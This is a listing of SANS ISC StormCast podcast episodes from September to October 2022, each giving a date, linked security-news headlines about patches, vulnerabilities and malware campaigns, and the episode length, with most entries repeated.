ISC StormCast for Wednesday, October 12th, 2022

Microsoft October 2022 Patches https://isc.sans.edu/forums/diary/October%202022%20Microsoft%20Patch%20Tuesday/29138/ SAP Patchday https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10 Top CVEs Actively Exploited By People s Republic of China State-Sponsored Cyber Actors https://www.cisa.gov/uscert/ncas/alerts/aa22-279a
10/12/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, October 12th, 2022

Microsoft October 2022 Patches https://isc.sans.edu/forums/diary/October%202022%20Microsoft%20Patch%20Tuesday/29138/ SAP Patchday https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10 Top CVEs Actively Exploited By People s Republic of China State-Sponsored Cyber Actors https://www.cisa.gov/uscert/ncas/alerts/aa22-279a
10/12/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, October 11th, 2022

Wireshark Display Filter Update https://isc.sans.edu/forums/diary/Wireshark+Specifying+a+Protocol+Stack+Layer+in+Display+Filters/29130 Fortinet Vulnerablity Update https://twitter.com/Horizon3Attack/status/1579285863108087810 BazarCall Social Engineering Tactics https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html RPKI Rate Limiting https://www.usenix.org/system/files/sec22-hlavacek.pdf
10/11/20226 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, October 11th, 2022

Wireshark Display Filter Update https://isc.sans.edu/forums/diary/Wireshark+Specifying+a+Protocol+Stack+Layer+in+Display+Filters/29130 Fortinet Vulnerablity Update https://twitter.com/Horizon3Attack/status/1579285863108087810 BazarCall Social Engineering Tactics https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html RPKI Rate Limiting https://www.usenix.org/system/files/sec22-hlavacek.pdf
10/11/20226 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, October 10th, 2022

Fortinet Update https://docs.fortinet.com/document/fortigate/7.2.2/fortios-release-notes/760203/introduction-and-supported-models Zimbra Vulnerability https://twitter.com/iagox86/status/1578084484720734209 https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis?referrer=activityFeed Microsoft Exchange Workaround Improved Again https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/ Ikea Smart Bulb Exploit https://www.synopsys.com/blogs/software-security/cyrc-advisory-ikea-tradfri-smart-lighting/
10/10/20226 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, October 10th, 2022

Fortinet Update https://docs.fortinet.com/document/fortigate/7.2.2/fortios-release-notes/760203/introduction-and-supported-models Zimbra Vulnerability https://twitter.com/iagox86/status/1578084484720734209 https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis?referrer=activityFeed Microsoft Exchange Workaround Improved Again https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/ Ikea Smart Bulb Exploit https://www.synopsys.com/blogs/software-security/cyrc-advisory-ikea-tradfri-smart-lighting/
10/10/20226 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, October 7th, 2022

Infosec Calendar https://isc.sans.edu/forums/diary/What+is+in+your+Infosec+Calendar/29118 OnionPoison: infected Tor Browser installer distributed through popular YouTube channel https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/ MacOS Architve Utility Vulnerability Details https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/
10/7/20225 minutes, 55 seconds
Episode Artwork

ISC StormCast for Friday, October 7th, 2022

Infosec Calendar https://isc.sans.edu/forums/diary/What+is+in+your+Infosec+Calendar/29118 OnionPoison: infected Tor Browser installer distributed through popular YouTube channel https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/ MacOS Architve Utility Vulnerability Details https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/
10/7/20225 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, October 5th, 2022

Credential Harvesting with Telegram https://isc.sans.edu/forums/diary/Credential%20Harvesting%20with%20Telegram%20API/29112/ Updated Microsoft Exchange Fix https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/ Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization https://www.cisa.gov/uscert/ncas/alerts/aa22-277a A New Supply Chain Attack on PHP https://blog.sonarsource.com/securing-developer-tools-a-new-supply-chain-attack-on-php/
10/5/20225 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, October 5th, 2022

Credential Harvesting with Telegram https://isc.sans.edu/forums/diary/Credential%20Harvesting%20with%20Telegram%20API/29112/ Updated Microsoft Exchange Fix https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/ Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization https://www.cisa.gov/uscert/ncas/alerts/aa22-277a A New Supply Chain Attack on PHP https://blog.sonarsource.com/securing-developer-tools-a-new-supply-chain-attack-on-php/
10/5/20225 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, October 4th, 2022

Microsoft Exchange Vulnerability Fix Bypassed https://twitter.com/testanull/status/1576774007826718720 Schneider Electric UMAS Patch Bypass https://securelist.com/the-secrets-of-schneider-electrics-umas-protocol/107435/ Supply Chain Attack via Trojanized Comm100 Chat Installer https://www.crowdstrike.com/blog/new-supply-chain-attack-leverages-comm100-chat-installer/
10/4/20225 minutes, 1 second
Episode Artwork

ISC StormCast for Tuesday, October 4th, 2022

Microsoft Exchange Vulnerability Fix Bypassed https://twitter.com/testanull/status/1576774007826718720 Schneider Electric UMAS Patch Bypass https://securelist.com/the-secrets-of-schneider-electrics-umas-protocol/107435/ Supply Chain Attack via Trojanized Comm100 Chat Installer https://www.crowdstrike.com/blog/new-supply-chain-attack-leverages-comm100-chat-installer/
10/4/20225 minutes, 1 second
Episode Artwork

ISC StormCast for Monday, October 3rd, 2022

Microsoft Exchange 0-Day Update https://isc.sans.edu/forums/diary/Exchange+Server+0Day+Actively+Exploited/29106 https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/ CISA Adds Atlasian Bitbucket Vulnerability to Exploited List https://www.cisa.gov/uscert/ncas/current-activity/2022/09/30/cisa-adds-three-known-exploited-vulnerabilities-catalog Every unsandboxed app has Full Disk Access if Terminal Does https://lapcatsoftware.com/articles/FullDiskAccess.html
10/3/20225 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, October 3rd, 2022

Microsoft Exchange 0-Day Update https://isc.sans.edu/forums/diary/Exchange+Server+0Day+Actively+Exploited/29106 https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/ CISA Adds Atlasian Bitbucket Vulnerability to Exploited List https://www.cisa.gov/uscert/ncas/current-activity/2022/09/30/cisa-adds-three-known-exploited-vulnerabilities-catalog Every unsandboxed app has Full Disk Access if Terminal Does https://lapcatsoftware.com/articles/FullDiskAccess.html
10/3/20225 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, September 30th, 2022

PNG Analysis with pngdump.py https://isc.sans.edu/forums/diary/PNG%20Analysis/29100/ Possible Exchange Server 0-Day Vulnerability https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html https://success.trendmicro.com/dcx/s/solution/000291651?language=en_US Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence
9/30/20226 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, September 30th, 2022

PNG Analysis with pngdump.py https://isc.sans.edu/forums/diary/PNG%20Analysis/29100/ Possible Exchange Server 0-Day Vulnerability https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html https://success.trendmicro.com/dcx/s/solution/000291651?language=en_US Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence
9/30/20226 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, September 29th, 2022

10 Years Later: Attacker re-discovering old VTiger CRM Vulnerability https://isc.sans.edu/forums/diary/10+Years+Later+Attacker+rediscovering+old+VTiger+CRM+Vulnerability/29098 IRS Reports Significant Increase in Texting Scams https://www.irs.gov/newsroom/irs-reports-significant-increase-in-texting-scams-warns-taxpayers-to-remain-vigilant Cloudflare Releases Turnsitle, a user-friendly, privacy-preserving CAPTCHA alternative https://blog.cloudflare.com/turnstile-private-captcha-alternative/ Cisco Patches https://kb.cert.org/vuls/id/855201 Chrome 106 Release https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop_27.html?m=1
9/29/20226 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, September 29th, 2022

10 Years Later: Attacker re-discovering old VTiger CRM Vulnerability https://isc.sans.edu/forums/diary/10+Years+Later+Attacker+rediscovering+old+VTiger+CRM+Vulnerability/29098 IRS Reports Significant Increase in Texting Scams https://www.irs.gov/newsroom/irs-reports-significant-increase-in-texting-scams-warns-taxpayers-to-remain-vigilant Cloudflare Releases Turnsitle, a user-friendly, privacy-preserving CAPTCHA alternative https://blog.cloudflare.com/turnstile-private-captcha-alternative/ Cisco Patches https://kb.cert.org/vuls/id/855201 Chrome 106 Release https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop_27.html?m=1
9/29/20226 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, September 28th, 2022

DNS Option 15 and Debugging DNSSEC Errors https://isc.sans.edu/forums/diary/DNS+Option+15+Debugging+DNSSEC+Errors/29094 Yari: A New Era of Yara Debugging https://engineering.avast.io/yari-a-new-era-of-yara-debugging/ HTTP Archive Almanac https://almanac.httparchive.org/en/2022/security
9/28/20227 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, September 28th, 2022

DNS Option 15 and Debugging DNSSEC Errors https://isc.sans.edu/forums/diary/DNS+Option+15+Debugging+DNSSEC+Errors/29094 Yari: A New Era of Yara Debugging https://engineering.avast.io/yari-a-new-era-of-yara-debugging/ HTTP Archive Almanac https://almanac.httparchive.org/en/2022/security
9/28/20227 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, September 27th, 2022

Easy Python Sandbox Detection https://isc.sans.edu/forums/diary/Easy+Python+Sandbox+Detection/29090 Hackers use PowerPoint Files for "Mouseover" Malware Delivery https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/ Redis 7.0 XAUTOCLAIM Heap Overflow https://github.com/redis/redis/security/advisories/GHSA-5gc4-76rx-22c9 Scoreboard Hacking https://maxwelldulin.com/BlogPost?post=7118102528
9/27/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, September 27th, 2022

Easy Python Sandbox Detection https://isc.sans.edu/forums/diary/Easy+Python+Sandbox+Detection/29090 Hackers use PowerPoint Files for "Mouseover" Malware Delivery https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/ Redis 7.0 XAUTOCLAIM Heap Overflow https://github.com/redis/redis/security/advisories/GHSA-5gc4-76rx-22c9 Scoreboard Hacking https://maxwelldulin.com/BlogPost?post=7118102528
9/27/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, September 26th, 2022

Kids Like Cookies and Malware Likes them Too https://isc.sans.edu/forums/diary/Kids+Like+Cookies+Malware+Too/29082 Downloading Files from Removed Domains https://isc.sans.edu/forums/diary/Downloading%20Samples%20From%20Takendown%20Domains/29086/ WhatsApp Security Updates https://www.whatsapp.com/security/advisories/2022/ Sophos RCE Flaw https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce CircleCI Phishing Attacks Used to Access GitHub Accounts https://discuss.circleci.com/t/circleci-security-alert-warning-phishing-attempt-for-login-credentials/45408
9/26/20225 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, September 26th, 2022

Kids Like Cookies and Malware Likes them Too https://isc.sans.edu/forums/diary/Kids+Like+Cookies+Malware+Too/29082 Downloading Files from Removed Domains https://isc.sans.edu/forums/diary/Downloading%20Samples%20From%20Takendown%20Domains/29086/ WhatsApp Security Updates https://www.whatsapp.com/security/advisories/2022/ Sophos RCE Flaw https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce CircleCI Phishing Attacks Used to Access GitHub Accounts https://discuss.circleci.com/t/circleci-security-alert-warning-phishing-attempt-for-login-credentials/45408
9/26/20225 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, September 23rd, 2022

RAT Delivered Through FODHelper https://isc.sans.edu/forums/diary/RAT+Delivered+Through+FODHelper/29078 Microsoft Endpoint Configuration Manager Spoofing Vulnerability https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972 New Fuzzing Tool: cifuzz https://github.com/CodeIntelligenceTesting/cifuzz No Security Updates from Apple https://support.apple.com/en-us/HT201222
9/23/20225 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, September 23rd, 2022

RAT Delivered Through FODHelper https://isc.sans.edu/forums/diary/RAT+Delivered+Through+FODHelper/29078 Microsoft Endpoint Configuration Manager Spoofing Vulnerability https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972 New Fuzzing Tool: cifuzz https://github.com/CodeIntelligenceTesting/cifuzz No Security Updates from Apple https://support.apple.com/en-us/HT201222
9/23/20225 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, September 22nd, 2022

Phishing Campaigns Use Free Only Resources https://isc.sans.edu/forums/diary/Phishing%20Campaigns%20Use%20Free%20Online%20Resources/29074/ Insecure use of tarfile.extract in Python https://bugs.python.org/issue1044#msg55464 Twitter Failed to Logout Users After Password Reset https://privacy.twitter.com/en/blog/2022/an-issue-impacting-password-resets
9/22/20226 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, September 22nd, 2022

Phishing Campaigns Use Free Only Resources https://isc.sans.edu/forums/diary/Phishing%20Campaigns%20Use%20Free%20Online%20Resources/29074/ Insecure use of tarfile.extract in Python https://bugs.python.org/issue1044#msg55464 Twitter Failed to Logout Users After Password Reset https://privacy.twitter.com/en/blog/2022/an-issue-impacting-password-resets
9/22/20226 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, September 21st, 2022

Chainsaw: Hunt, search and extract event log records https://isc.sans.edu/diary/Chainsaw%3A+Hunt%2C+search%2C+and+extract+event+log+records/29066 PDU Exploits past NAT https://claroty.com/team82/research/jumping-nat-to-shut-down-electric-devices Tamper Protection will be turned on for all Enterprise Customers https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/tamper-protection-will-be-turned-on-for-all-enterprise-customers/ba-p/3616478
9/21/20226 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, September 21st, 2022

Chainsaw: Hunt, search and extract event log records https://isc.sans.edu/diary/Chainsaw%3A+Hunt%2C+search%2C+and+extract+event+log+records/29066 PDU Exploits past NAT https://claroty.com/team82/research/jumping-nat-to-shut-down-electric-devices Tamper Protection will be turned on for all Enterprise Customers https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/tamper-protection-will-be-turned-on-for-all-enterprise-customers/ba-p/3616478
9/21/20226 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, September 20th, 2022

Preventing ISO Malware https://isc.sans.edu/diary/Preventing+ISO+Malware+/29062 State of Emotet https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022 Undermining Microsoft Teams Security by Mining Tokens https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
9/20/20226 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, September 20th, 2022

Preventing ISO Malware https://isc.sans.edu/diary/Preventing+ISO+Malware+/29062 State of Emotet https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022 Undermining Microsoft Teams Security by Mining Tokens https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
9/20/20226 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, September 19th, 2022

Word Maldoc With CustomXML and Renamed VBAProject.bin https://isc.sans.edu/diary/Word+Maldoc+With+CustomXML+and+Renamed+VBAProject.bin/29056 2FA on Lock Screens https://www.bbc.com/news/uk-england-london-62809151 Chrome and Edge Enhances Spellcheck Features Expose PII, Even Your Password https://www.otto-js.com/news/article/chrome-and-edge-enhanced-spellcheck-features-expose-pii-even-your-passwords Reconstructing Content Reflected in Glasses https://arxiv.org/abs/2205.03971
9/19/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, September 19th, 2022

Word Maldoc With CustomXML and Renamed VBAProject.bin https://isc.sans.edu/diary/Word+Maldoc+With+CustomXML+and+Renamed+VBAProject.bin/29056 2FA on Lock Screens https://www.bbc.com/news/uk-england-london-62809151 Chrome and Edge Enhances Spellcheck Features Expose PII, Even Your Password https://www.otto-js.com/news/article/chrome-and-edge-enhanced-spellcheck-features-expose-pii-even-your-passwords Reconstructing Content Reflected in Glasses https://arxiv.org/abs/2205.03971
9/19/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, September 16th, 2022

Malicous Word Document With a Frameset https://isc.sans.edu/diary/Malicious+Word+Document+with+a+Frameset/29052 CVE-2022-34721 Exploit https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721 Trojaned Putty Used in Attacks https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing Lenovo BIOS Updates https://support.lenovo.com/us/en/product_security/LEN-94953#Desktop
9/16/20226 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, September 16th, 2022

Malicous Word Document With a Frameset https://isc.sans.edu/diary/Malicious+Word+Document+with+a+Frameset/29052 CVE-2022-34721 Exploit https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721 Trojaned Putty Used in Attacks https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing Lenovo BIOS Updates https://support.lenovo.com/us/en/product_security/LEN-94953#Desktop
9/16/20226 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, September 15th, 2022

Easy Process Injection within Python https://isc.sans.edu/diary/Easy+Process+Injection+within+Python/29048 Queen Elizabeth Related Phishing https://twitter.com/threatinsight/status/1570092339984584705 Microsoft 365 Auto Updates Apps on Locked or Idle Devices https://techcommunity.microsoft.com/t5/microsoft-365-blog/update-under-lock-improved-update-experience-for-microsoft-365/ba-p/3618901
9/15/20225 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, September 15th, 2022

Easy Process Injection within Python https://isc.sans.edu/diary/Easy+Process+Injection+within+Python/29048 Queen Elizabeth Related Phishing https://twitter.com/threatinsight/status/1570092339984584705 Microsoft 365 Auto Updates Apps on Locked or Idle Devices https://techcommunity.microsoft.com/t5/microsoft-365-blog/update-under-lock-improved-update-experience-for-microsoft-365/ba-p/3618901
9/15/20225 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, September 14th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+2022+Patch+Tuesday/29044/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html Magento Vendor Fishpig Hacked, Backdoors Added https://sansec.io/research/rekoobe-fishpig-magento
9/14/20226 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, September 14th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+2022+Patch+Tuesday/29044/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html Magento Vendor Fishpig Hacked, Backdoors Added https://sansec.io/research/rekoobe-fishpig-magento
9/14/20226 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, September 13th, 2022

VirusTotal Result Comparisons for Honeypot Malware https://isc.sans.edu/diary/VirusTotal+Result+Comparisons+for+Honeypot+Malware/29040 Apple Patches https://support.apple.com/en-us/HT201222 Lorenz Ransomware Group Cracks MiVoice and Calls Back For Free https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
9/13/20227 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, September 13th, 2022

VirusTotal Result Comparisons for Honeypot Malware https://isc.sans.edu/diary/VirusTotal+Result+Comparisons+for+Honeypot+Malware/29040 Apple Patches https://support.apple.com/en-us/HT201222 Lorenz Ransomware Group Cracks MiVoice and Calls Back For Free https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
9/13/20227 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, September 12th, 2022

Malware Abusing File Exchange Site https://isc.sans.edu/diary/Phishing+Word+Documents+with+Suspicious+URL/29034 Bypassing GitHub Required Reviewers to Submit Malicious Code https://www.legitsecurity.com/blog/bypassing-github-required-reviewers-to-submit-malicious-code Crimeware Trends: Ransomware Developers Turn to Intermittent Encryption https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/ Lets Encrypt Reviving Certificate Revocation Lists https://letsencrypt.org/2022/09/07/new-life-for-crls.html
9/12/20228 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, September 12th, 2022

Malware Abusing File Exchange Site https://isc.sans.edu/diary/Phishing+Word+Documents+with+Suspicious+URL/29034 Bypassing GitHub Required Reviewers to Submit Malicious Code https://www.legitsecurity.com/blog/bypassing-github-required-reviewers-to-submit-malicious-code Crimeware Trends: Ransomware Developers Turn to Intermittent Encryption https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/ Lets Encrypt Reviving Certificate Revocation Lists https://letsencrypt.org/2022/09/07/new-life-for-crls.html
9/12/20228 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, September 9th, 2022

Analyzing Obfuscated VBS with CyberChef https://isc.sans.edu/diary/Analyzing+Obfuscated+VBS+with+CyberChef/2902 pfBlockerNG Unauthenticated RCE https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ GifShell attack creates reverse shell using microsoft teams gifs https://www.bleepingcomputer.com/news/security/gifshell-attack-creates-reverse-shell-using-microsoft-teams-gifs/
9/9/20227 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, September 9th, 2022

Analyzing Obfuscated VBS with CyberChef https://isc.sans.edu/diary/Analyzing+Obfuscated+VBS+with+CyberChef/2902 pfBlockerNG Unauthenticated RCE https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ GifShell attack creates reverse shell using microsoft teams gifs https://www.bleepingcomputer.com/news/security/gifshell-attack-creates-reverse-shell-using-microsoft-teams-gifs/
9/9/20227 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, September 8th, 2022

PHP Deserialization Exploit Attempt https://isc.sans.edu/diary/PHP+Deserialization+Exploit+attempt/29024 TA505 Group's TeslaGun In-Depth Analysis https://www.prodaft.com/resource/detail/ta505-ta505-groups-tesla-gun-depth-analysis Cisco publishes unpatched Small Business Router Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-vpnbypass-Cpheup9O Shikitega - New stealthy malware targeting Linux https://thehackernews.com/2022/09/new-stealthy-shikitega-malware.html
9/8/20225 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, September 8th, 2022

PHP Deserialization Exploit Attempt https://isc.sans.edu/diary/PHP+Deserialization+Exploit+attempt/29024 TA505 Group's TeslaGun In-Depth Analysis https://www.prodaft.com/resource/detail/ta505-ta505-groups-tesla-gun-depth-analysis Cisco publishes unpatched Small Business Router Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-vpnbypass-Cpheup9O Shikitega - New stealthy malware targeting Linux https://thehackernews.com/2022/09/new-stealthy-shikitega-malware.html
9/8/20225 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, September 7th, 2022

Analysis of an Encoded Cobalt Strike Beacon https://isc.sans.edu/diary/Analysis+of+an+Encoded+Cobalt+Strike+Beacon/29014 EvilProxy Phishing-As-A-Service with MFA Bypass https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web Zyxel Patches RCE Vulnerability https://www.zyxel.com/support/Zyxel-security-advisory-for-format-string-vulnerability-in-NAS.shtml Moobot Going after D-Link Devices https://unit42.paloaltonetworks.com/moobot-d-link-devices/
9/7/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, September 7th, 2022

Analysis of an Encoded Cobalt Strike Beacon https://isc.sans.edu/diary/Analysis+of+an+Encoded+Cobalt+Strike+Beacon/29014 EvilProxy Phishing-As-A-Service with MFA Bypass https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web Zyxel Patches RCE Vulnerability https://www.zyxel.com/support/Zyxel-security-advisory-for-format-string-vulnerability-in-NAS.shtml Moobot Going after D-Link Devices https://unit42.paloaltonetworks.com/moobot-d-link-devices/
9/7/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, September 6th, 2022

James Webb JPEG With Malware https://isc.sans.edu/diary/James+Webb+JPEG+With+Malware/29010 Windows Defender False Positive https://www.theregister.com/2022/09/05/windows_defender_chrome_false_positive/ Google Chrome 0-Day https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html Sharkbot Android Infostealer in Google Play Store https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/ Nmap 7.93 - 25th Anniversary Release https://seclists.org/nmap-announce/2022/1
9/6/20225 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, September 6th, 2022

James Webb JPEG With Malware https://isc.sans.edu/diary/James+Webb+JPEG+With+Malware/29010 Windows Defender False Positive https://www.theregister.com/2022/09/05/windows_defender_chrome_false_positive/ Google Chrome 0-Day https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html Sharkbot Android Infostealer in Google Play Store https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/ Nmap 7.93 - 25th Anniversary Release https://seclists.org/nmap-announce/2022/1
9/6/20225 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, September 2nd, 2022

Jolokie Scans: Possible Hunt for Vulnerable Apache Geode Servers https://isc.sans.edu/diary/Jolokia+Scans%3A+Possible+Hunt+for+Vulnerable+Apache+Geode+Servers+%28CVE-2022-37021%29/29006 Microsoft Basic Authentication Deprecation in Exchange Online https://techcommunity.microsoft.com/t5/exchange-team-blog/basic-authentication-deprecation-in-exchange-online-september/ba-p/3609437 Mobile App Supply Chain Vulnerabilities Could Endanger Sensitive Business Information https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mobile-supply-chain-aws Gitlab Update https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#brute-force-attack-may-guess-a-password-even-when-2fa-is-enabled
9/2/20226 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, September 2nd, 2022

Jolokie Scans: Possible Hunt for Vulnerable Apache Geode Servers https://isc.sans.edu/diary/Jolokia+Scans%3A+Possible+Hunt+for+Vulnerable+Apache+Geode+Servers+%28CVE-2022-37021%29/29006 Microsoft Basic Authentication Deprecation in Exchange Online https://techcommunity.microsoft.com/t5/exchange-team-blog/basic-authentication-deprecation-in-exchange-online-september/ba-p/3609437 Mobile App Supply Chain Vulnerabilities Could Endanger Sensitive Business Information https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mobile-supply-chain-aws Gitlab Update https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#brute-force-attack-may-guess-a-password-even-when-2fa-is-enabled
9/2/20226 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, September 1st, 2022

Underscores and DNS: The Privacy Story https://isc.sans.edu/diary/Underscores+and+DNS%3A+The+Privacy+Story/29002 iOS 12.5.6 Update https://support.apple.com/en-us/HT201222 Malware Disguised as Google Translate Desktop App https://research.checkpoint.com/2022/check-point-research-detects-crypto-miner-malware-disguised-as-google-translate-desktop-and-other-legitimate-applications/ Apache Geode Deserialization Flaw https://lists.apache.org/thread/qrvhmytsshsk5xcb68pwccw3y6m8o8nr Foxit PDF Reader Update https://sec-consult.com/vulnerability-lab/advisory/outdated-javascript-engine-leads-to-rce-in-foxit-pdf-reader/
9/1/20225 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, September 1st, 2022

Underscores and DNS: The Privacy Story https://isc.sans.edu/diary/Underscores+and+DNS%3A+The+Privacy+Story/29002 iOS 12.5.6 Update https://support.apple.com/en-us/HT201222 Malware Disguised as Google Translate Desktop App https://research.checkpoint.com/2022/check-point-research-detects-crypto-miner-malware-disguised-as-google-translate-desktop-and-other-legitimate-applications/ Apache Geode Deserialization Flaw https://lists.apache.org/thread/qrvhmytsshsk5xcb68pwccw3y6m8o8nr Foxit PDF Reader Update https://sec-consult.com/vulnerability-lab/advisory/outdated-javascript-engine-leads-to-rce-in-foxit-pdf-reader/
9/1/20225 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, August 31st, 2022

